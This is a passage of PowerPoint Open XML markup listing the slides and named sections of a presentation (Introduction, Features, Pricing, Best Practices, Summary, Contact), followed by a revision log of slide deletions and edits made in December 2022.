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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId57"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="312" r:id="rId3"/>
    <p:sldId id="271" r:id="rId4"/>
    <p:sldId id="311" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="313" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="314" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="316" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="285" r:id="rId17"/>
    <p:sldId id="261" r:id="rId18"/>
    <p:sldId id="328" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="317" r:id="rId21"/>
    <p:sldId id="295" r:id="rId22"/>
    <p:sldId id="318" r:id="rId23"/>
    <p:sldId id="337" r:id="rId24"/>
    <p:sldId id="259" r:id="rId25"/>
    <p:sldId id="338" r:id="rId26"/>
    <p:sldId id="332" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="299" r:id="rId29"/>
    <p:sldId id="335" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="333" r:id="rId32"/>
    <p:sldId id="334" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="339" r:id="rId35"/>
    <p:sldId id="323" r:id="rId36"/>
    <p:sldId id="268" r:id="rId37"/>
    <p:sldId id="324" r:id="rId38"/>
    <p:sldId id="325" r:id="rId39"/>
    <p:sldId id="340" r:id="rId40"/>
    <p:sldId id="309" r:id="rId41"/>
    <p:sldId id="327" r:id="rId42"/>
    <p:sldId id="258" r:id="rId43"/>
    <p:sldId id="265" r:id="rId44"/>
    <p:sldId id="326" r:id="rId45"/>
    <p:sldId id="287" r:id="rId46"/>
    <p:sldId id="267" r:id="rId47"/>
    <p:sldId id="310" r:id="rId48"/>
    <p:sldId id="341" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="321" r:id="rId51"/>
    <p:sldId id="319" r:id="rId52"/>
    <p:sldId id="342" r:id="rId53"/>
    <p:sldId id="274" r:id="rId54"/>
    <p:sldId id="329" r:id="rId55"/>
    <p:sldId id="343"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87D23CD-B602-460A-A813-2153E30FDF4A}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Introduction" id="{88C9ED78-D283-4A38-9B9F-89A99A8821E8}">
          <p14:sldIdLst>
            <p14:sldId id="312"/>
            <p14:sldId id="271"/>
            <p14:sldId id="311"/>
            <p14:sldId id="336"/>
            <p14:sldId id="282"/>
            <p14:sldId id="313"/>
            <p14:sldId id="283"/>
            <p14:sldId id="281"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Features" id="{75D79CF9-7C66-452D-87E5-B0F49B27798B}">
          <p14:sldIdLst>
            <p14:sldId id="314"/>
            <p14:sldId id="286"/>
            <p14:sldId id="284"/>
            <p14:sldId id="288"/>
            <p14:sldId id="316"/>
            <p14:sldId id="266"/>
            <p14:sldId id="285"/>
            <p14:sldId id="261"/>
            <p14:sldId id="328"/>
            <p14:sldId id="297"/>
            <p14:sldId id="317"/>
            <p14:sldId id="295"/>
            <p14:sldId id="318"/>
            <p14:sldId id="337"/>
            <p14:sldId id="259"/>
            <p14:sldId id="338"/>
            <p14:sldId id="332"/>
            <p14:sldId id="289"/>
            <p14:sldId id="299"/>
            <p14:sldId id="335"/>
            <p14:sldId id="301"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334"/>
            <p14:sldId id="308"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Pricing" id="{A374E189-DD77-4C32-9A8B-700616703BF7}">
          <p14:sldIdLst>
            <p14:sldId id="339"/>
            <p14:sldId id="323"/>
            <p14:sldId id="268"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Best Practices" id="{64F3492F-FF2D-4FF8-A8D4-F6C932C557E1}">
          <p14:sldIdLst>
            <p14:sldId id="340"/>
            <p14:sldId id="309"/>
            <p14:sldId id="327"/>
            <p14:sldId id="258"/>
            <p14:sldId id="265"/>
            <p14:sldId id="326"/>
            <p14:sldId id="287"/>
            <p14:sldId id="267"/>
            <p14:sldId id="310"/>
            <p14:sldId id="341"/>
            <p14:sldId id="320"/>
            <p14:sldId id="321"/>
            <p14:sldId id="319"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Summary" id="{ACEA2EF8-250B-4619-B436-ADC5860DC36C}">
          <p14:sldIdLst>
            <p14:sldId id="342"/>
            <p14:sldId id="274"/>
            <p14:sldId id="329"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Contact" id="{ADB2C3C8-6B4D-4225-9BF7-093318F40C8E}">
          <p14:sldIdLst>
            <p14:sldId id="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a:srgbClr val="151B19"/>
    <a:srgbClr val="7F7F7F"/>
    <a:srgbClr val="3B76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05AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" v="10" dt="2022-12-15T08:43:28.16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29" autoAdjust="0"/>
    <p:restoredTop sz="90076" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="146" d="100"/>
          <a:sy n="146" d="100"/>
        </p:scale>
        <p:origin x="774" y="1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66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 Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}"/>
    <pc:docChg chg="custSel addSld delSld modSld modSection">
      <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:52.274" v="60" actId="207"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:03.885" v="22" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2306348760" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:49.241" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2721483808" sldId="270"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:38.216" v="1"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2721483808" sldId="270"/>
            <ac:picMk id="2" creationId="{1D903481-8117-75A1-DE47-A8A5C2C10A3F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:49.264" v="45" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="734959548" sldId="272"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:30.815" v="52" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2548415428" sldId="273"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:46.805" v="31" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="659156195" sldId="275"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:18.861" v="38" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3960696034" sldId="322"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:39.129" v="8" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1366304542" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:50.118" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3750197137" sldId="331"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp add setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:47.158" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4257694091" sldId="336"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:47.158" v="3"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4257694091" sldId="336"/>
            <ac:spMk id="25" creationId="{47DDD5C6-582A-4ED0-A2B2-01007B337089}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:47.158" v="3"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4257694091" sldId="336"/>
            <ac:spMk id="26" creationId="{C5480330-D626-4BB1-A072-22D07F7C66BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:38:47.158" v="3"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4257694091" sldId="336"/>
            <ac:cxnSpMk id="27" creationId="{CFA49A52-5015-434E-A9B4-E3B97DB8B4ED}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:33.390" v="7" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1522342727" sldId="337"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:33.390" v="7" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:spMk id="2" creationId="{2A7241B3-63AE-6638-658E-D28831FF60E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:23.714" v="6"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:spMk id="11" creationId="{F96187D8-B32D-4D1A-8C48-A15933DDCD8C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:23.714" v="6"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:spMk id="13" creationId="{D019BB32-A409-4C93-9090-8BDDC45E5796}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:23.714" v="6"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:spMk id="17" creationId="{74ED70DB-1943-4E5C-A1B6-D49DFE44028B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:23.714" v="6"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:cxnSpMk id="9" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:23.714" v="6"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1522342727" sldId="337"/>
            <ac:cxnSpMk id="15" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:40:47.551" v="19" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2484025646" sldId="338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:40:47.551" v="19" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484025646" sldId="338"/>
            <ac:spMk id="2" creationId="{F233D38F-1C30-5C37-3AFB-E59F196FCBA2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:48.241" v="10"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484025646" sldId="338"/>
            <ac:spMk id="23" creationId="{902D1A37-7C2A-4258-95A8-919D781C6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:48.241" v="10"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484025646" sldId="338"/>
            <ac:spMk id="25" creationId="{5C0776A0-F3D1-AEC9-DE44-3676E3568899}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:48.241" v="10"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484025646" sldId="338"/>
            <ac:cxnSpMk id="21" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:39:48.241" v="10"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484025646" sldId="338"/>
            <ac:cxnSpMk id="27" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:32.441" v="28" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3074019314" sldId="339"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:32.441" v="28" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3074019314" sldId="339"/>
            <ac:spMk id="2" creationId="{994EA740-AAF9-32E5-1EAA-4F1D16442BEB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:01.328" v="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3074019314" sldId="339"/>
            <ac:spMk id="35" creationId="{902D1A37-7C2A-4258-95A8-919D781C6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:01.328" v="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3074019314" sldId="339"/>
            <ac:spMk id="37" creationId="{5C0776A0-F3D1-AEC9-DE44-3676E3568899}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:01.328" v="21"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3074019314" sldId="339"/>
            <ac:cxnSpMk id="34" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:01.328" v="21"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3074019314" sldId="339"/>
            <ac:cxnSpMk id="38" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:05.355" v="35" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3511464081" sldId="340"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:05.355" v="35" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511464081" sldId="340"/>
            <ac:spMk id="4" creationId="{E2E1539C-60EA-F88D-0758-3C4503DD13C0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:44.473" v="30"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511464081" sldId="340"/>
            <ac:spMk id="24" creationId="{902D1A37-7C2A-4258-95A8-919D781C6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:44.473" v="30"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511464081" sldId="340"/>
            <ac:spMk id="26" creationId="{5C0776A0-F3D1-AEC9-DE44-3676E3568899}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:44.473" v="30"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511464081" sldId="340"/>
            <ac:cxnSpMk id="22" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:41:44.473" v="30"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3511464081" sldId="340"/>
            <ac:cxnSpMk id="28" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:33.379" v="42" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="329250582" sldId="341"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:33.379" v="42" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="329250582" sldId="341"/>
            <ac:spMk id="4" creationId="{9603C149-E5DD-5777-A43E-9DB966042F4A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:17.087" v="37"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="329250582" sldId="341"/>
            <ac:spMk id="33" creationId="{902D1A37-7C2A-4258-95A8-919D781C6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:17.087" v="37"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="329250582" sldId="341"/>
            <ac:spMk id="34" creationId="{5C0776A0-F3D1-AEC9-DE44-3676E3568899}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:17.087" v="37"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="329250582" sldId="341"/>
            <ac:cxnSpMk id="32" creationId="{D8689CE0-64D2-447C-9C1F-872D111D8AC3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:17.087" v="37"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="329250582" sldId="341"/>
            <ac:cxnSpMk id="35" creationId="{B0AA360F-DECB-4836-8FB6-22C4BC3FB02D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg delDesignElem">
        <pc:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:03.365" v="49" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3285621786" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:43:03.365" v="49" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3285621786" sldId="342"/>
            <ac:spMk id="4" creationId="{A7722834-6892-3621-3885-2B24572837EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:47.156" v="44"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3285621786" sldId="342"/>
            <ac:spMk id="14" creationId="{902D1A37-7C2A-4258-95A8-919D781C6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Marko Markovic" userId="720cc31e-d2a4-46e3-ac26-41fc412e6af6" providerId="ADAL" clId="{B705AFE4-81C7-4FCF-A135-6B7ADE4F8AF7}" dt="2022-12-15T08:42:47.156" v="44"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3285621786" sldId="342"/>
